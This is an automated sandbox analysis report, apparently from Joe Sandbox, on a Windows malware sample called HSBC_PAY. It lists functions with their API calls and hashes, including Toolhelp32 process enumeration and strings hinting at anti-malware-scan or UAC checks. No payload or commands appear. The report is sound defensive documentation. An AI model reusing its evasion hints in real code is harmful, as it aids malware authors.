                                                                    • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                    • Instruction Fuzzy Hash: 9DE012F81052025EEB143F219D80B377B6EAFD5755F5444A9A904CE150FF38C842AE35
                                                                    Function 02A9705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(?), ref: 02A9735A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID: H
                                                                    • API String ID: 3341692771-2852464175
                                                                    • Opcode ID: c91b5410085988d2d1ec07e32fea0d814f88458fd1b85db900e706e2e0bd8c7e
                                                                    • Instruction ID: 9fd7e2c297e8ac8a4ed4cf81030bc83c72bbf4c41cf628158800d5e5c1c828f3
                                                                    • Opcode Fuzzy Hash: c91b5410085988d2d1ec07e32fea0d814f88458fd1b85db900e706e2e0bd8c7e
                                                                    • Instruction Fuzzy Hash: B2B1C2B5A116089FDF14CF99D980A9DFBF6FF49314F2481A9E805AB364DB30A845CF60
                                                                    Function 02A8E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02A8E701
                                                                      • Part of subcall function 02A8E2E4: VariantClear.OLEAUT32(?), ref: 02A8E2F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy
                                                                    • String ID:
                                                                    • API String ID: 274517740-0
                                                                    • Opcode ID: e0fcfa6ab0196594ec3d0d4240bda4ef7f9f3cb867aab1d4892ea91cb4059cf9
                                                                    • Instruction ID: 370052226d00b2cde5b428f3bb3898115c127834523a0cf4bc2e5c18ca478f0b
                                                                    • Opcode Fuzzy Hash: e0fcfa6ab0196594ec3d0d4240bda4ef7f9f3cb867aab1d4892ea91cb4059cf9
                                                                    • Instruction Fuzzy Hash: 2A118E30B40260D7CB34BF69DBC4A6A67EAAF857507045426F65A8B245EF30CC01CAA6
                                                                    Function 02A815CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A81A03,?,02A81FC1), ref: 02A815E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID: 0`
                                                                    • API String ID: 4275171209-3339448193
                                                                    • Opcode ID: add972bc7acc2ef4a92522c61f5286ad7017d51e73b6bd67c71745ca5edaf55d
                                                                    • Instruction ID: 1cb54a27b290b0ed311a949e5465a9e09b5c50197753cf35559981f19ace9b5c
                                                                    • Opcode Fuzzy Hash: add972bc7acc2ef4a92522c61f5286ad7017d51e73b6bd67c71745ca5edaf55d
                                                                    • Instruction Fuzzy Hash: 79F0E7F0B923008BEB89DF799A843056BE6E789344F548579D60ADF298EB7194128B10
                                                                    Function 02A8E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant
                                                                    • String ID:
                                                                    • API String ID: 1927566239-0
                                                                    • Opcode ID: 3e79267999b6b5242d3f16a2a71d3a9967833baf4dbe892407379654a63e3f31
                                                                    • Instruction ID: 25031744d72b088c992fab5deff573fd5e2a2c6559c28f3c20321fb8aaef69a9
                                                                    • Opcode Fuzzy Hash: 3e79267999b6b5242d3f16a2a71d3a9967833baf4dbe892407379654a63e3f31
                                                                    • Instruction Fuzzy Hash: E9314D71A00218EBDF10EFA8CA84AAA77F8FB0D314F5445A5F909D3250DB31DD91CBA5
                                                                    Function 02A96CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02A96D39,?,?,?,00000000), ref: 02A96D19
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgString
                                                                    • String ID:
                                                                    • API String ID: 4225568880-0
                                                                    • Opcode ID: 5a1c167f8c4887130998384bf069301f1aa8526a94bb69a8454fd3717e0edcb7
                                                                    • Instruction ID: edf513c87d42369feed5ef821219345b930e278fe648d2fc65f293b02758a853
                                                                    • Opcode Fuzzy Hash: 5a1c167f8c4887130998384bf069301f1aa8526a94bb69a8454fd3717e0edcb7
                                                                    • Instruction Fuzzy Hash: 59E0E530640704BFE700FBAACD11D5A7BEDEF49B10B510471A800D7500EE345D008860
                                                                    Function 02A85814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A85832
                                                                      • Part of subcall function 02A85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A80000,02AAD790), ref: 02A85A94
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AB2
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AD0
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A85AEE
                                                                      • Part of subcall function 02A85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A85B37
                                                                      • Part of subcall function 02A85A78: RegQueryValueExA.ADVAPI32(?,02A85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001), ref: 02A85B55
                                                                      • Part of subcall function 02A85A78: RegCloseKey.ADVAPI32(?,02A85B84,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A85B77
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                    • String ID:
                                                                    • API String ID: 2796650324-0
                                                                    • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                    • Instruction ID: f021a1d83f138e8b36f06716e9d6eac5b2936c7c010b918ea2c1dbad137460e9
                                                                    • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                    • Instruction Fuzzy Hash: 83E06571A002148BCB10EF6889C0A9637D8BB08750F8109A6EC98DF34ADBB0D9248BE0
                                                                    Function 02A87D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A87DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                    • Instruction ID: bbb7c0205fa60e285da61cf37f42f1fa9b41f5972180fd05b454acf93ccfc29c
                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                    • Instruction Fuzzy Hash: 4DD05B763082507AE324A65A5D84EFB5BDCCFC9770F104639B658C3180E7208C0187B1
                                                                    Function 02A87E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02AA2A41,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,Initialize), ref: 02A87E3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                    • Instruction ID: 65f94da6000ed9f7f9e84745435ad37af9d5e373d4493ef43fc703a0106c8f07
                                                                    • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                    • Instruction Fuzzy Hash: 66C08CA62022040E2E60B3FC0DC490A42CD29081383B02F61E178CA1D2DF21D8522810
                                                                    Function 02A87E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                    • Instruction ID: 5a3ddfa591d1ae8fb3977a724755d3fdd2f446b49dbec9d070408e47027c7e37
                                                                    • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                    • Instruction Fuzzy Hash: FEC08CE62222020A2A64B2FC0DC442A42C819081383B42F21F278DA2E2DF218C232820
                                                                    Function 02A84C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID:
                                                                    • API String ID: 3341692771-0
                                                                    • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                    • Instruction ID: 54e0babc6b6bf637b772546a784d6a8879bebbfea7f3f8bb63afba85473b2a43
                                                                    • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                    • Instruction Fuzzy Hash: 1AC012F264033547EB216B989CC0756A2CCDB092A5F5400A1D508D7240FB609C004765
                                                                    Function 02AABB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeSetEvent.WINMM(00002710,00000000,02AABB3C,00000000,00000001), ref: 02AABB58
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Eventtime
                                                                    • String ID:
                                                                    • API String ID: 2982266575-0
                                                                    • Opcode ID: ac260ef4c3da0738f1eecdb15af9c0921ba69932f71e1caebaf81fb04141c893
                                                                    • Instruction ID: d5a31c538bdf0c3fe790caeaa836bff69884141838cb0c02836e291036d4a936
                                                                    • Opcode Fuzzy Hash: ac260ef4c3da0738f1eecdb15af9c0921ba69932f71e1caebaf81fb04141c893
                                                                    • Instruction Fuzzy Hash: DBC092F07D23403EFA20A6A81CE2F63158ED714B14F600812BB00FF2C2EAE258505A34
                                                                    Function 02A84BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02A84BEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID:
                                                                    • API String ID: 2525500382-0
                                                                    • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                    • Instruction ID: a15aa7979b8cee1dfe2d4d808eadf637971b7eab6984e00590ccb4ef5e7996c5
                                                                    • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                    • Instruction Fuzzy Hash: 01B0123C28830358FA5033610E84F7204DC1B542CBF8400A19F28CC0C0FF04C4018833
                                                                    Function 02A84BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02A84C03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID:
                                                                    • API String ID: 3341692771-0
                                                                    • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                    • Instruction ID: 2fc1536329bc4afcb12f4e68d5c181af3c8377ab0fd347a8861268c1b6bf457a
                                                                    • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                    • Instruction Fuzzy Hash: C8A022FC8803030ACF0B332E028002A20BB3FF03003CAC0F802000A000AF3A8000AE30
                                                                    Function 02A81682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02A81FC1), ref: 02A816A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 4ea2c2476e1a339de202ed5d5f7c1001d9b2791fddd3cb376aef400434bb93df
                                                                    • Instruction ID: ade7f81ffa0300ab6126ebcb4855fc24eb332796699cf099e1a68ee044e707c2
                                                                    • Opcode Fuzzy Hash: 4ea2c2476e1a339de202ed5d5f7c1001d9b2791fddd3cb376aef400434bb93df
                                                                    • Instruction Fuzzy Hash: 75F096B2B40B55ABD7109F599C81742BB94FB00314F050139E588AB340DBB098128FD4
                                                                    Function 02A816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A81FE4), ref: 02A81704
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: daae0463706a4bd9281f80ac0f4f12d3a1534575e83ebd5ec01fa24867465837
                                                                    • Instruction ID: 0c413ff8638695be87bab223f732e1b6f0fbeefca2ab815b474d80561ef3deaf
                                                                    • Opcode Fuzzy Hash: daae0463706a4bd9281f80ac0f4f12d3a1534575e83ebd5ec01fa24867465837
                                                                    • Instruction Fuzzy Hash: 33E08675340301EFD7106B795D80712BBD8EB44654F144479F589DB241EAA0E8128F60

                                                                    Non-executed Functions

                                                                    Function 02A9A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A9ABDB,?,?,02A9AC6D,00000000,02A9AD49), ref: 02A9A968
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A9A980
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A9A992
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A9A9A4
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A9A9B6
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A9A9C8
                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A9A9DA
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A9A9EC
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A9A9FE
                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A9AA10
                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A9AA22
                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A9AA34
                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A9AA46
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A9AA58
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A9AA6A
                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A9AA7C
                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A9AA8E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
